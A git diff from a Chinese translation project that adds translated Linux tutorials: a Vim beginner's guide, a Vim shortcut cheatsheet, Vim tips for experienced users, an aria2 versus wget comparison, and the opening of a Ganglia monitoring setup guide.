编辑器有用技巧][5] + +对一个程序员来说,选择一个文本编辑器是一件非常重要的事。因为不同编辑器之间有着不少的差异:图形界面或者非图形界面、不同的快捷键、不同的编程语言支持、不同的插件以及自定义设置等等。我建议不是去搜索最棒的编辑器,而是去选择最适合你的习惯且最适应你的任务的那一个。假如你打算在一个团体中工作,那么最好和你的共事者选择一样的编辑器。这样的话,一旦你在使用中遇到问题,你就可以去向他们寻求帮助。 + +这正是我在几年之前开始使用 Vim 的原因。通常来说,Vim 会被置于传说中的 Emacs 的对立面。我承认我对 Emacs 知之甚少,但是对于它俩,你需要知道的是它们都可以被深度定制,并且在初学时也都非常令人困惑。这个教程并不会介绍有关 Vim 的所有内容,而是将介绍一些基础以使你在最初就能正确使用它,随后还会展示一些小技巧,借此(希望能)让你有能力自己去探索学习。 + +Vim 一词来源于 “VI iMproved”。Vi 是一个被广泛安装于 Unix 系统的非图形界面文本编辑器,并且它也被默认安装在了 Linux 系统中。Vim 是这个原始编辑器的增强版,但是不同于 Vi,并不是每个发行版都默认安装了它。 + +### 安装 + +在 Ubuntu 中可以使用如下命令来安装 Vim: + +``` +sudo apt-get install vim +``` + +如果你已经对某些插件有了兴趣,使用以下命令: + +``` +sudo apt-cache search vim +``` + +这命令将给你输出一个很长的和 Vim 有关的包列表。在这之中,有针对不同编程语言的工具,有插件管理器,等等。 + +在这系列教程中,我将会在 Ubuntu 上使用最新版的 Vim(7.3.154,LCTT 译注:现在最新版为 8.0)。当然你也可以使用其它任何版本。 + +### 热身 + +在终端输入 `vim` 命令,你将会看到一个非常棒的欢迎界面。 + + ![vim-welcome](https://maketecheasier-2d0f.kxcdn.com/assets/uploads/2012/02/vim-welcome.jpg "vim-welcome") + +(LCTT 译注:看到了欢迎界面中那行“Help poor children in Uganda!” 了吗?) + +如果你之前从未使用过 Vi 或者 Vim,那么你很可能甚至不知道该怎么退出它... 是的,这是事实。**任何你常用的快捷键在 Vim 中都将失去原有的效果**。(LCTT 译注:网上有个流传的笑话——“如何制造乱码”,“让新手退出 vi”) + +首先,要使用任何命令式的功能,像保存(save)或者退出(exit),你都先得输入一个冒号(`:`)。保存是 `:w` 而退出是 `:q`。如果你想不保存文件就退出,那么就要使用强制退出命令 `:q!`。Vim 中非常棒的一点是你不需要分开输入各个命令,换言之,如果你想保存然后退出,你就可以直接使用 `:wq`。 + +现在,我们退出 Vim 再打开一个文本文件。为此,你只需把想要编辑的文件名加在命令后面即可: + +``` +vim [文本文件名] +``` + + ![vim-file](https://maketecheasier-2d0f.kxcdn.com/assets/uploads/2012/02/vim-file.jpg "vim-file") + +一般而言,当你打开一个文本文件,你将会处在查看模式。这使得 Vim 与众不同并且最初会让人感到困惑。Vim 主要由两种模式构成:查看模式和编辑模式。查看模式用于查看内容并且使用一些命令。想要进入编辑模式,只需按 `i` 键进行插入(insert)或者 `a` 键进行添加(add)。想要返回到查看模式或者进行命令式功能的操作,按 `Escape` 键即可。插入(insert)和添加(add)的差异仅仅在于你是想在光标位置之前还是在光标之后进入编辑模式并进行文字输入。要想彻底地明白,你应该亲自去尝试一下。我的建议是:仅在行尾使用添加(add),而在其它时候使用插入(insert)。 + +(LCTT 译注:此段落中“查看模式”原文是 “visual mode”,疑为“view mode”,在此模式下可以查看文本,但是不能进行编辑;而“visual mode” 是编辑模式的一种,可以按 `v` 键进入,然后就可以用方向键从当前光标位置开始进行选择,并以反白的视觉效果显示,通常选择后可以按 `y` 进行复制、按 `d` 进行剪切等操作。) + +要想在文本之中移动光标,你通常可以使用键盘上的方向键,它们无论是在查看模式还是在编辑模式都可以生效。不过,一个真正的纯粹主义者将会告诉你使用按键 `h` 向左,`j` 向下,`k` 向上,`l` 向右来(在查看模式)进行移动。 + +现在你已经明白了如何和简单地控制 Vim,我们再来更加深入一些。 + +### 一些简单命令 + +现在你已经熟悉了在正常模式和插入模式之间进行切换,下面是一些可以在正常模式中使用的命令: + +* `x`:删除一个字符 +* `u`:撤销一个操作(相当与 `Ctrl+z`) +* `dd`:删除一行内容 +* `dw`:删除一个单词 +* `yy`:复制一行内容 +* `yw`:复制一个单词 +* `p`:粘贴一个之前删除或复制的行或者单词 +* `e`:跳到下个单词(LCTT 译注:词尾)(比单纯用方向键更快) +* `r`:替换一个字母(按 `r`,松开,然后再按新字母) + +当然不止这些,不过这些对现在来说已经足够了。如果你掌握了上面的全部,你将能你很顺溜地使用 Vim 了。 + +对于那些还想知道更多的人,我再多提一下。你可以在任何这些命令之前加上一个数值,那么这个命令将被重复执行相应的次数。例如,`5x` 将在当前行连续删除 5 个字母,而 `3p` 将会粘贴 3 次。 + +### 高级命令 + +最后,作为对你自己继续探索的鼓励和示例,这里给出几个高级且常用的命令: + +* `/所搜索的内容`:在文中搜索特定内容 +* `:sp 文本文件名`:将屏幕水平分割成上下两半,新文件展示在另一半。想要在两侧切换焦点,可以使用 `Ctrl+w` 快捷键。 + + ![vim-sp](https://maketecheasier-2d0f.kxcdn.com/assets/uploads/2012/02/vim-sp.jpg "vim-sp") +* `:vsp 文本文件名`:同上,但是是垂直分割屏幕 +* `Ctrl+Shift+C` 和 `Ctrl+Shift+V`:在终端中复制和粘贴文本 +* `:! 命令名`:在 Vim 中运行 Vim 外的终端命令,直接发送给 shell。例如,`:! ls` 将在不退出编辑器的同时,显示你当前目录内的文件。 + + ![vim-ls](https://maketecheasier-2d0f.kxcdn.com/assets/uploads/2012/02/vim-ls.jpg "vim-ls") + +### 结论 + +我觉得你现在应该已经有了足够的准备来开始使用 Vim。你还可以通过安装各种插件,编辑 `~.vimrc` 文件,或者在 shell 中输入 `vimtutor` 命令来使用交互式教程以学到更多。 + +如果你有任何你想分享的关于 Vim 的其它命令,请在评论中告知我们。 + +-------------------------------------------------------------------------------- + +via: https://www.maketecheasier.com/start-with-vim-linux/ + +作者:[Himanshu Arora][a] +译者:[Yinr](https://github.com/Yinr) +校对:[jasminepeng](https://github.com/jasminepeng) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.maketecheasier.com/author/himanshu/ +[1]:https://www.maketecheasier.com/author/adrienbrochard/ +[2]:https://www.maketecheasier.com/start-with-vim-linux/#comments +[3]:https://www.maketecheasier.com/vim-keyboard-shortcuts-cheatsheet/ +[4]:https://www.maketecheasier.com/vim-tips-tricks-for-experienced-users/ +[5]:https://www.maketecheasier.com/vim-tips-tricks-advanced-users/ +[6]:https://www.maketecheasier.com/category/linux-tips/ +[7]:http://www.facebook.com/sharer.php?u=https%3A%2F%2Fwww.maketecheasier.com%2Fstart-with-vim-linux%2F +[8]:http://twitter.com/share?url=https%3A%2F%2Fwww.maketecheasier.com%2Fstart-with-vim-linux%2F&text=The+Beginner%26%238217%3Bs+Guide+to+Start+Using+Vim +[9]:mailto:?subject=The%20Beginner%E2%80%99s%20Guide%20to%20Start%20Using%20Vim&body=https%3A%2F%2Fwww.maketecheasier.com%2Fstart-with-vim-linux%2F +[10]:https://www.maketecheasier.com/turn-dropbox-into-a-blogging-tool-with-scriptogram/ +[11]:https://www.maketecheasier.com/4-sms-back-up-applications-to-keep-your-messages-safe-android/ +[12]:https://www.maketecheasier.com/series/vim-user-guide/ +[13]:https://support.google.com/adsense/troubleshooter/1631343 diff --git a/published/201701/20131227 Vim Keyboard Shortcuts Cheatsheet - part2.md b/published/201701/20131227 Vim Keyboard Shortcuts Cheatsheet - part2.md new file mode 100644 index 0000000000..eede6720b2 --- /dev/null +++ b/published/201701/20131227 Vim Keyboard Shortcuts Cheatsheet - part2.md @@ -0,0 +1,211 @@ +Vim 快捷键速查表 +============================================================ + + + ![](https://maketecheasier-2d0f.kxcdn.com/assets/uploads/2013/12/vim-shortcut-cheatsheet-featured.jpg "Vim Keyboard Shortcuts Cheatsheets") + +本文是 [Vim 用户指南][12] 系列的其中一篇: + +* [Vim 初学者入门指南][3] +* Vim 快捷键速查表 +* [5 个针对有经验用户的 Vim 技巧][4] +* [3 个针对高级用户的 Vim 编辑器实用技巧][5] + +Vim 编辑器是一个基于命令行的工具,是传奇编辑器 vi 的增强版。尽管图形界面的富文本编辑有很多,但是熟悉 Vim 对于每一位 Linux 的使用者都能有所帮助——无论你是经验丰富的系统管理员,还是刚上手树莓派的新手用户。 + +这个轻量级的编辑器是个非常强大的工具。在有经验的使用者手中,它能完成不可思议的任务。除了常规的文本编辑功能以外,它还支持一些进阶特性。例如,基于正则表达式的搜索和替换、编码转换,以及语法高亮、代码折叠等的编程特性。 + +使用 Vim 时有一个非常重要的一点需要注意,那就是按键的功能取决于编辑器当前的“模式”。例如,在“普通模式”输入字母`j`时,光标会向下移动一行。而当你在“插入模式”下输入字符,则只是正常的文字录入。 + +下面就是速查表,以便于你充分利用 Vim。 + +### 基本操作 + +| 快捷键 | 功能 | +| --- | --- | +| `Esc` | 从当前模式转换到“普通模式”。所有的键对应到命令。 | +| `i` | “插入模式”用于插入文字。回归按键的本职工作。 | +| `:` | “命令行模式” Vim 希望你输入类似于保存该文档命令的地方。 | + + +### 方向键 + +| 快捷键 | 功能 | +| --- | --- | +| `h` | 光标向左移动一个字符 | +| `j` 或 `Ctrl + J` | 光标向下移动一行 | +| `k` 或 `Ctrl + P` | 光标向上移动一行 | +| `l` | 光标向右移动一个字符 | +| `0` | (数字 0)移动光标至本行开头 | +| `$` | 移动光标至本行末尾 | +| `^` | 移动光标至本行第一个非空字符处 | +| `w` | 向前移动一个词 (上一个字母和数字组成的词之后) | +| `W` | 向前移动一个词 (以空格分隔的词) | +| `5w` | 向前移动五个词 | +| `b` | 向后移动一个词 (下一个字母和数字组成的词之前) | +| `B` | 向后移动一个词 (以空格分隔的词) | +| `5b` | 向后移动五个词 | +| `G` | 移动至文件末尾 | +| `gg` | 移动至文件开头 | + + +### 浏览文档 + +| 快捷键 | 功能 | +| --- | --- | +| `(` | 跳转到上一句 | +| `)` | 跳转到下一句 | +| `{` | 跳转到上一段 | +| `}` | 跳转到下一段 | +| `[[` | 跳转到上一部分 | +| `]]` | 跳转到下一部分 | +| `[]` | 跳转到上一部分的末尾 | +| `][` | 跳转到上一部分的开头 | + + +### 插入文本 + +| 快捷键 | 功能 | +| --- | --- | +| `a` | 在光标后插入文本 | +| `A` | 在行末插入文本 | +| `i` | 在光标前插入文本 | +| `o` | (小写字母 o)在光标下方新开一行 | +| `O` | (大写字母 O)在光标上方新开一行 | + + + +### 特殊插入 + +| 快捷键 | 功能 | +| --- | --- | +| `:r [filename]` | 在光标下方插入文件 [filename] 的内容 | +| `:r ![command]` | 执行命令 [command] ,并将输出插入至光标下方 | + + + +### 删除文本 + +| 快捷键 | 功能 | +| --- | --- | +| `x` | 删除光标处字符 | +| `dw` | 删除一个词 | +| `d0` | 删至行首 | +| `d$` | 删至行末 | +| `d)` | 删至句末 | +| `dgg` | 删至文件开头 | +| `dG` | 删至文件末尾 | +| `dd` | 删除该行 | +| `3dd` | 删除三行 | + +### 简单替换文本 + +| 快捷键 | 功能 | +| --- | --- | +| `r{text}` | 将光标处的字符替换成 {text} | +| `R` | 进入覆写模式,输入的字符将替换原有的字符 | + +### 复制/粘贴文本 + +| 快捷键 | 功能 | +| --- | --- | +| `yy` | 复制当前行至存储缓冲区 | +| `["x]yy` | 复制当前行至寄存器 x | +| `p` | 在当前行之后粘贴存储缓冲区中的内容 | +| `P` | 在当前行之前粘贴存储缓冲区中的内容 | +| `["x]p` | 在当前行之后粘贴寄存器 x 中的内容 | +| `["x]P` | 在当前行之前粘贴寄存器 x 中的内容 | + +### 撤销/重做操作 + +| 快捷键 | 功能 | +| --- | --- | +| `u` | 撤销最后的操作 | +| `Ctrl+r` | 重做最后撤销的操作 | + +### 搜索和替换 + +| 快捷键 | 功能 | +| --- | --- | +| `/search_text` | 检索文档,在文档后面的部分搜索 search_text | +| `?search_text` | 检索文档,在文档前面的部分搜索 search_text | +| `n` | 移动到后一个检索结果 | +| `N` | 移动到前一个检索结果 | +| `:%s/original/replacement` | 检索第一个 “original” 字符串并将其替换成 “replacement” | +| `:%s/original/replacement/g` | 检索并将所有的 “original” 替换为 “replacement” | +| `:%s/original/replacement/gc` | 检索出所有的 “original” 字符串,但在替换成 “replacement” 前,先询问是否替换 | + +### 书签 + +| 快捷键 | 功能 | +| --- | --- | +| `m {a-zA-Z}` | 在当前光标位置设置书签,书签名可用一个大小写字母({a-zA-Z}) | +| `:marks` | 列出所有书签 | +| `{a-zA-Z}` | 跳转到书签 {a-zA-Z} | + + +### 选择文本 + +| 快捷键 | 功能 | +| --- | --- | +| `v` | 进入逐字可视模式 | +| `V` | 进入逐行可视模式 | +| `Esc` | 退出可视模式 | + + +### 改动选中文本 + +| 快捷键 | 功能 | +| --- | --- | +| `~` | 切换大小写 | +| `d` | 删除一个词 | +| `c` | 变更 | +| `y` | 复制 | +| `>` | 右移 | +| `<` | 左移 | +| `!` | 通过外部命令进行过滤 | + + +### 保存并退出 + +| 快捷键 | 功能 | +| --- | --- | +| `:q` | 退出 Vim,如果文件已被修改,将退出失败 | +| `:w` | 保存文件 | +| `:w new_name` | 用 new_name 作为文件名保存文件 | +| `:wq` | 保存文件并退出 Vim | +| `:q!` | 退出 Vim,不保存文件改动 | +| `ZZ` | 退出 Vim,如果文件被改动过,保存改动内容 | +| `ZQ` | 与 :q! 相同,退出 Vim,不保存文件改动 | + +### 下载 Vim 快捷键速查表 + +仅仅是这样是否还不足以满足你?别担心,我们已经为你整理好了一份下载版的速查表,以备不时之需。 + +[点此下载(英文)][14] + +-------------------------------------------------------------------------------- + +via: https://www.maketecheasier.com/vim-keyboard-shortcuts-cheatsheet/ + +作者:[Himanshu Arora][a] +译者:[martin2011qi](https://github.com/martin2011qi) +校对:[wxy](https://github.com/wxy) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.maketecheasier.com/author/himanshu/ +[1]:https://www.maketecheasier.com/author/mayank/ +[2]:https://www.maketecheasier.com/vim-keyboard-shortcuts-cheatsheet/#comments +[3]:https://linux.cn/article-8143-1.html +[4]:https://www.maketecheasier.com/vim-tips-tricks-for-experienced-users/ +[5]:https://www.maketecheasier.com/vim-tips-tricks-advanced-users/ +[6]:https://www.maketecheasier.com/category/linux-tips/ +[7]:http://www.facebook.com/sharer.php?u=https%3A%2F%2Fwww.maketecheasier.com%2Fvim-keyboard-shortcuts-cheatsheet%2F +[8]:http://twitter.com/share?url=https%3A%2F%2Fwww.maketecheasier.com%2Fvim-keyboard-shortcuts-cheatsheet%2F&text=Vim+Keyboard+Shortcuts+Cheatsheet +[9]:mailto:?subject=Vim%20Keyboard%20Shortcuts%20Cheatsheet&body=https%3A%2F%2Fwww.maketecheasier.com%2Fvim-keyboard-shortcuts-cheatsheet%2F +[10]:https://www.maketecheasier.com/locate-system-image-tool-in-windows-81/ +[11]:https://www.maketecheasier.com/create-system-image-in-windows8/ +[12]:https://www.maketecheasier.com/series/vim-user-guide/ +[13]:https://support.google.com/adsense/troubleshooter/1631343 +[14]:http://www.maketecheasier.com/cheatsheet/vim-keyboard-shortcuts-cheatsheet/ diff --git a/translated/tech/20140812 5 Vim Tips and Tricks for Experienced Users - part3.md b/published/201701/20140812 5 Vim Tips and Tricks for Experienced Users - part3.md similarity index 62% rename from translated/tech/20140812 5 Vim Tips and Tricks for Experienced Users - part3.md rename to published/201701/20140812 5 Vim Tips and Tricks for Experienced Users - part3.md index a29c22aebc..0d231d81b0 100644 --- a/translated/tech/20140812 5 Vim Tips and Tricks for Experienced Users - part3.md +++ b/published/201701/20140812 5 Vim Tips and Tricks for Experienced Users - part3.md @@ -6,14 +6,15 @@ * [Vim 初学者入门指南][3] * [Vim 快捷键速查表][4] +* 5 个针对有经验用户的 Vim 实用技巧 * [3 个针对高级用户的 Vim 编辑器实用技巧][5] Vim 编辑器提供了很多的特性,要想全部掌握它们很困难。然而,花费更多的时间在命令行编辑器上总是有帮助的。毫无疑问,和 Vim 用户们进行交流能够让你更快地学习新颖有创造性的东西。 -**注** - 本文中用到的例子,使用的 Vim 版本是 7.4.52 。 +**注:** 本文中用到的例子,使用的 Vim 版本是 7.4.52 。 -### 1\. 同时编辑多个文件 +### 1、 同时编辑多个文件 如果你是一名软件开发者或者把 Vim 作为主要的编辑器,那么可能很多时候你需要同时编辑多个文件。“紧跟(following)”是在同时编辑多个文件时可用的实用技巧。 @@ -25,24 +26,25 @@ vim 文件1 文件2 文件3 第一个文件(例子中的文件1)将成为当前文件并被读入缓冲区。 -在编辑器中,使用 ‘:next’ 或 ’:n’ 命令来移动到下一个文件,使用 ‘:prev’ 或 ‘:N’ 命令返回上一个文件。如果想直接切换到第一个文件或最后一个文件,使用 ‘:bf’ 和 ‘:bl’ 命令。特别地,如果想打开另外的文件并编辑,使用 ‘:e’ 命令并把文件名作为参数(如果该文件不在当前目录中则需要完整路径做为参数)。 +在编辑器中,使用 `:next` 或 `:n` 命令来移动到下一个文件,使用 `:prev` 或 `:N` 命令返回上一个文件。如果想直接切换到第一个文件或最后一个文件,使用 `:bf` 和 `:bl` 命令。特别地,如果想打开另外的文件并编辑,使用 `:e` 命令并把文件名作为参数(如果该文件不在当前目录中则需要完整路径做为参数)。 -任何时候如果需要列出当前打开的所有文件,使用 ‘:ls’ 命令。看下面展示的屏幕截图。 +任何时候如果需要列出当前打开的所有文件,使用 `:ls` 命令。看下面展示的屏幕截图。 ![vim-ls](https://maketecheasier-2d0f.kxcdn.com/assets/uploads/2014/08/vim-ls.png "vim-ls") -注意 ”%a” 表示文件在当前活动窗口,而 “#” 表示文件在上一个活动窗口。 +注意 ”%a” 表示文件在当前活动窗口,而 “#” 表示上一个活动窗口的文件。 -### 2\. 通过自动补全节约时间 +### 2、 通过自动补全节约时间 + +想节约时间并提高效率吗?使用缩写吧。使用它们能够快速写出文件中多次出现、复杂冗长的词。在 Vim 中缩写命令写就是 `ab` 。 -想节约时间并提高效率吗?使用 ‘abbreviations(缩写)’吧。使用它们能够快速写出文件中多次出现、复杂冗长的词。在 Vim 命令中 ‘abbreviations(缩写)’的缩写就是 ‘ab’ 。 比如,当你运行下面的命令以后: ``` :ab asap as soon as possible ``` -文件中出现的每一个 "asap" 都会被自动替换为 “as soon as possible” ,就像你自己输入的一样。 +文件中出现的每一个 `asap` 都会被自动替换为 `as soon as possible` ,就像你自己输入的一样。 类似地,你可以使用缩写来更正常见的输入错误。比如,下面的命令 @@ -50,16 +52,16 @@ vim 文件1 文件2 文件3 :ab recieve receive ``` -将会自动更正拼写错误,就像你自己输入的一样。如果在一次特殊情况下你想阻止扩展/更正发生,那么你只需要在输入一个单词的最后一个字母以后按 “Ctrl + V” ,然后按空格键。 +将会自动更正拼写错误,就像你自己输入的一样。如果在一次特殊情况下你想阻止缩写展开或更正发生,那么你只需要在输入一个单词的最后一个字母以后按 `Ctrl + V` ,然后按空格键。 -如果你想把刚才使用的缩写保存下来,从而当你下次使用 Vim 编辑器的时候可以再次使用,那么只需将完整的 ‘ab’ 命令(没有起始的冒号)添加到 ”/etc/vim/vimrc“ 文件中。如果想删除某个缩写,你可以使用 “una” 命令。比如: ‘una asap’ 。 +如果你想把刚才使用的缩写保存下来,从而当你下次使用 Vim 编辑器的时候可以再次使用,那么只需将完整的 `ab` 命令(没有起始的冒号)添加到 `/etc/vim/vimrc` 文件中。如果想删除某个缩写,你可以使用 `una` 命令。比如: `una asap` 。 -### 3\. 分离窗口来进行‘复制/粘贴’ +### 3、 切分窗口便于复制/粘贴 -有时,你需要将一段代码或文本的一部分从一个文件复制到另一个。当使用 GUI(图形界面)编辑器的时候,这很容易实现,但是当使用一个命令行编辑器的时候,这就变得比较困难并且很费时间。幸运的是, Vim 提供了一种高效、节约时间的方式来完成这件事。 +有时,你需要从一个文件将一段代码或文本的一部分复制到另一个。当使用 GUI(图形界面)编辑器的时候,这很容易实现,但是当使用一个命令行编辑器的时候,这就变得比较困难并且很费时间。幸运的是, Vim 提供了一种高效、节约时间的方式来完成这件事。 -打开两个文件中的一个然后分离 Vim 窗口来打开另一个文件。可以通过使用 ‘split’ 命令并以文件名作为参数来完成这件事。比如: +打开两个文件中的一个然后切分 Vim 窗口来打开另一个文件。可以通过使用 `split` 命令并以文件名作为参数来完成这件事。比如: ``` :split test.c @@ -69,11 +71,11 @@ vim 文件1 文件2 文件3 ![vim-split](https://maketecheasier-2d0f.kxcdn.com/assets/uploads/2014/08/vim-split.png "vim-split") -注意到 ‘split’ 命令水平分离 Vim 窗口。如果你想垂直分离窗口,那么你可以使用 ‘vsplit’ 命令。当同时打开了两个文件并从一个文件中复制好内容以后,按 “Ctrl + W” 切换到另一个文件,然后’粘贴’。 +注意到 `split` 命令水平分离 Vim 窗口。如果你想垂直分离窗口,那么你可以使用 `vsplit` 命令。当同时打开了两个文件并从一个文件中复制好内容以后,按 `Ctrl + W` 切换到另一个文件,然后粘贴。 -### 4\. 保存一个没有权限的已编辑文件 +### 4、 保存一个没有权限的已编辑文件 -有时候当你对一个文件做了大量更改以后才会意识到该文件仅有 ‘只读’ 权限。 +有时候当你对一个文件做了大量更改以后才会意识到你对该文件仅有 `只读` 权限。 ![vim-sudo](https://maketecheasier-2d0f.kxcdn.com/assets/uploads/2014/08/vim-sudo.png "vim-sudo") @@ -83,24 +85,23 @@ vim 文件1 文件2 文件3 :w !sudo tee % ``` -这个命令将会向你询问密码,就像在命令行中使用 ‘sudo’ 一样,然后就能保存更改。 +这个命令将会向你询问密码,就像在命令行中使用 `sudo` 一样,然后就能保存更改。 -**一个相关的技巧**:在 Vim 中编辑一个文件的时候,如果想快速进入命令行提示符,可以在编辑器中运行 ‘:sh’ 命令,从而你将进入一个交互的 shell 中。完成以后,运行 ‘exit’ 命令可以快速回到 Vim 模式中。 +**一个相关的技巧**:在 Vim 中编辑一个文件的时候,如果想快速进入命令行提示符,可以在编辑器中运行 `:sh` 命令,从而你将进入一个交互的 shell 中。完成以后,运行 `exit` 命令可以快速回到 Vim 模式中。 -### 5\. 在复制/粘贴过程中保持缩进 +### 5、 在复制/粘贴过程中保持缩进 大多数有经验的程序员在 Vim 上工作时都会启用自动缩进。虽然这是一个节约时间的做法,但是在粘贴一段已经缩进了的代码的时候会产生新的问题。比如,下图是我把一段已缩进代码粘贴到一个在自动缩进的 Vim 编辑器中打开的文件中时遇到的问题: ![vim-indentation](https://maketecheasier-2d0f.kxcdn.com/assets/uploads/2014/08/vim-indentation.png "vim-indentation") -这个问题的解决方法是 ‘pastetoggle’ 选项。 - 在 ‘/etc/vim/vimrc’ 文件中加入下面这行内容: +这个问题的解决方法是 `pastetoggle` 选项。在 `/etc/vim/vimrc` 文件中加入下面这行内容: ``` set pastetoggle= ``` -然后当你在 ‘插入’ 模式中准备粘贴代码前先按 ‘F2’ 键,就不会再出现上图中的问题,这样会保留原始的缩进。注意,你可以用其他的任何键来代替 ‘F2’ 如果它已经映射到了别的功能上。 +然后当你在 `插入` 模式中准备粘贴代码前先按 `F2` 键,就不会再出现上图中的问题,这样会保留原始的缩进。注意,你可以用其他的任何键来代替 `F2`,如果它已经映射到了别的功能上。 ### 结论 @@ -112,7 +113,7 @@ via: https://www.maketecheasier.com/vim-tips-tricks-for-experienced-users/ 作者:[Himanshu Arora][a] 译者:[ucasFL](https://github.com/ucasFL) -校对:[校对者ID](https://github.com/校对者ID) +校对:[wxy](https://github.com/wxy) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 diff --git a/published/201701/20150629 Aria2 Vs Wget – Choose your Download Manager.md b/published/201701/20150629 Aria2 Vs Wget – Choose your Download Manager.md new file mode 100644 index 0000000000..625a6ceb8e --- /dev/null +++ b/published/201701/20150629 Aria2 Vs Wget – Choose your Download Manager.md @@ -0,0 +1,73 @@ +aria2 与 wget :选择你的下载管理器 +============================================================ + +任何没有下载管理器的 Linux 操作系统是不完整的。多年来,基于 Linux 的发行版使用 wget 作为默认下载管理器。它是一个很棒的小程序,可以在命令行下工作,如果你需要安装东西、下载东西、运行 shell 脚本等,某种程度上都可以在 wget 中完成任务。在过去的很多年里,我们发现 wget 缺乏一些高级的功能,而它的替代品 ** aria2** ,由于满足了高级 Linux 用户的渴望而受到了许多用户的关注。我们将在本文中回顾 **aria2** 的安装过程以及 wget 和 aria2 之间的区别,因此你可以决定哪个下载管理器最符合你的需要。 + +### 安装 aria2 + +**在 Ubuntu/Debian 中安装 aria2:** + +只要在 Ubuntu 中运行下面的命令安装: + +``` +sudo apt-get install aria2 +``` + +[ + ![aria2](http://linuxpitstop.com/wp-content/uploads/2015/06/aria2.png) +][1] + +**在 Fedora/RHEL/Centos 中安装 aria2:** + +运行下面的命令在 Fedora/RHEL 和基于 Centos 的系统中安装: + +``` +sudo yum install aria2 +``` + +**在 Arch Linux 中安装 aria2:** + +运行下面的命令在基于 Arch Linux 的系统中安装。 + +``` +sudo pacman -Sy aria2 +``` + +### aria2 的重要功能 + +让我们来讨论 aria2 中使它如此受欢迎的重要功能: + +* 通过使用多个连接下载文件,最大限度地利用可用带宽。 +* 同时下载多个文件和同时下载的能力。 +* torrent 客户端提供的所有功能都可以在这个小程序中找到。 +* 它提供 meta 链接下载。 +* 支持使用 JSON-RPC 和 XML-RPC 协议的远程过程调用。 +* 无需等待当前下载完成,轻松批量下载文件。 + +### aria2 的一些副作用: + +aria2 的多线程机制可能会使目标服务器过载。相比下来 wget 就轻量级多了,wget 比 aria2 消耗资源少 20%。aria2 尚未经受 wget 那样巨大的使用规模的测试,因此可能完全准备好成为默认下载管理器。 + +### wget 的重要特性 + +* 当然它是最广泛使用和测试的下载管理器。 +* 它是一个简单的程序,具有较少的功能,但稳定工作了几十年。 +* 默认所有 Linux 发行版上都有,不需要繁重的安装。 +* 与 aria2 相比更轻量级。 + +### 总结 + +虽然 wget 没有丰富的功能,但仍然工作得相当不错,然而,高级用户肯定会喜欢 aria2,因为它满足更快和并发下载的需要。aria2 可能需要很长时间来取代 wget 成为默认下载管理器,而目前 wget 用在几乎所有 linux 发行版的安装程序脚本中。 + +-------------------------------------------------------------------------------- + +via: http://linuxpitstop.com/aria-2-vs-wget/ + +作者:[Aun][a] +译者:[geekpi](https://github.com/geekpi) +校对:[wxy](https://github.com/wxy) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:http://linuxpitstop.com/author/aun/ +[1]:http://linuxpitstop.com/wp-content/uploads/2015/06/aria2.png diff --git a/published/20151001 Powerline – Adds Powerful Statuslines and Prompts to Vim Editor and Bash Terminal.md b/published/201701/20151001 Powerline – Adds Powerful Statuslines and Prompts to Vim Editor and Bash Terminal.md similarity index 100% rename from published/20151001 Powerline – Adds Powerful Statuslines and Prompts to Vim Editor and Bash Terminal.md rename to published/201701/20151001 Powerline – Adds Powerful Statuslines and Prompts to Vim Editor and Bash Terminal.md diff --git a/published/20160110 3 Ways to Permanently and Securely Delete ‘Files and Directories in Linux.md b/published/201701/20160110 3 Ways to Permanently and Securely Delete ‘Files and Directories in Linux.md similarity index 100% rename from published/20160110 3 Ways to Permanently and Securely Delete ‘Files and Directories in Linux.md rename to published/201701/20160110 3 Ways to Permanently and Securely Delete ‘Files and Directories in Linux.md diff --git a/published/201701/20160610 Setting Up Real-Time Monitoring with Ganglia.md b/published/201701/20160610 Setting Up Real-Time Monitoring with Ganglia.md new file mode 100755 index 0000000000..0f3bf6ae9a --- /dev/null +++ b/published/201701/20160610 Setting Up Real-Time Monitoring with Ganglia.md @@ -0,0 +1,220 @@ +使用 Ganglia 对 linux 网格和集群服务器进行实时监控 +=========== + +从系统管理员接手服务器和主机管理以来,像应用监控这样的工具就成了他们的好帮手。其中比较有名的有 [Nagios][11]、 [Zabbix][10]、 [Icinga][9] 和 Centreon。以上这些是重量级的监控工具,让一个新手管理员来设置,并使用其中的高级特性是有些困难的。 + +本文将向你介绍 Ganglia,它是一个易于扩展的监控系统。使用它可以实时查看 Linux 服务器和集群(图形化展示)中的各项性能指标。 + +![Install Gangila Monitoring in Linux](http://www.tecmint.com/wp-content/uploads/2016/06/Install-Gangila-Monitoring-in-Linux.png) + +*在 Linux 上安装 Ganglia* + +**Ganglia** 能够让你以**集群**(按服务器组)和**网格**(按地理位置)的方式更好地组织服务器。 + +这样,我们可以创建一个包含所有远程主机的网格,然后将那些机器按照其它标准分组成小的集合。 + +此外, Ganglia 的 web 页面对移动设备进行过优化,也允许你导出 `csv` 和 `.json` 格式的数据。 + +我们的测试环境包括一个安装 Ganglia 的主节点服务器 CentOS 7 (IP 地址 192.168.0.29),和一个作为被监控端的 Ubuntu 14.04 主机(192.168.0.32)。我们将通过 Ganglia 的 Web 页面来监控这台 Ubuntu 主机。 + +下面的例子可以给大家提供参考,CentOS7 作为主节点,Ubuntu 作为被监控对象。 + +### 安装和配置 Ganglia + +请遵循以下步骤,在主节点服务器安装监控工具。 + +1、 启用 [EPEL 仓库][7] ,然后安装 Ganglia 和相关工具: + +``` +# yum update && yum install epel-release +# yum install ganglia rrdtool ganglia-gmetad ganglia-gmond ganglia-web +``` + +在上面这步随 Ganglia 将安装一些应用,它们的功能如下: + +- `rrdtool`,Round-Robin 数据库,它是一个储存并图形化显示随着时间变化的数据的工具; +- `ganglia-gmetad` 一个守护进程,用来收集被监控主机的数据。被监控主机与主节点主机都要安装 Ganglia-gmond(监控守护进程本身); +- `ganglia-web` 提供 Web 前端,用于显示监控系统的历史数据和图形。 +   +2、 使用 Apache 提供的基本认证功能,为 Ganglia Web 界面(`/usr/share/ganglia`)配置身份认证。 + +如果你想了解更多高级安全机制,请参阅 Apache 文档的 [授权与认证][6]部分。 + 